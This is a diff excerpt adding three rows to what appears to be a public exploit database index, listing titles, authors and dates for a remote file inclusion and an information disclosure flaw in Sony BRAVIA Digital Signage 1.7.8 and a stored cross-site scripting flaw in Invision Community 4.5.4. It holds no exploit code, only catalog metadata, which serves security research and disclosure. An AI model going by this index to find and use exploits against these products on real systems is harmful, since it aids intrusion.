+49186,exploits/hardware/webapps/49186.txt,"Sony BRAVIA Digital Signage 1.7.8 - Unauthenticated Remote File Inclusion",2020-12-03,LiquidWorm,webapps,hardware,
+49187,exploits/hardware/webapps/49187.txt,"Sony BRAVIA Digital Signage 1.7.8 - System API Information Disclosure",2020-12-03,LiquidWorm,webapps,hardware,
+49188,exploits/multiple/webapps/49188.txt,"Invision Community 4.5.4 - 'Field Name' Stored Cross-Site Scripting",2020-12-03,"Hemant Patidar",webapps,multiple,